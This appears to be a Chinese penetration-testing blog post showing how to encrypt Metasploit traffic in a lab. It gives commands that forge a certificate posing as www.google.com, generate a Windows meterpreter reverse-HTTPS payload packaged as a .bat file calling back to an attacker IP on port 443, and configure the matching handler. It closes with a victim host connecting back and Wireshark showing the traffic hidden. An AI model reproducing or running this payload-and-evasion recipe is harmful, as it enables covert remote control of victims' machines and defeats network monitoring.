登录后台

已禁止登录!

页面导航

介绍

上次写了反弹shell的流量加密,这次来写一下MSF的流量加密




开启加密之路

也是一样准备两台机器

1. 攻击机kali,生成一个证书:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

2023-01-03T09:16:40.png

这个证书是Google的一个证书,当然是伪造的,也可以自己改,改成自己想要的

2. 攻击机kali,生成好证书以后,生成一个msf木马:

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.179.137 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat

只需要改ip地址就好,端口不要动它,因为加密的端口就是走443出去的

2023-01-03T09:25:51.png

生成个.bat的自动化的木马

3. 攻击机kali,把msf监听器配置上:

msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_winhttps
msf5 exploit(multi/handler) > set lhost 192.168.179.137
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set HandlerSSLCert /root/桌面/www.google.com.pem
msf5 exploit(multi/handler) > set StagerVerifySSLCert true
msf5 exploit(multi/handler) > run

2023-01-03T09:33:40.png

手动访问一下网址,出现It works!就是成功了,证书因为是自己生成的所有会有不安全提示,如果能搞到官方的就不会有这种情况了
2023-01-03T09:35:53.png

4. 受害机windows2012上线:

2023-01-03T09:39:24.png

2023-01-03T09:42:07.png

成功上线正常执行命令

5. 攻击机kali,打开wireshark:

2023-01-03T09:45:14.png

所有流量都已加密

后持续更新
反弹shell加密
MSF流量加密
CS生成证书是配置profile进行加密
CS域前置加密
腾讯云函数
......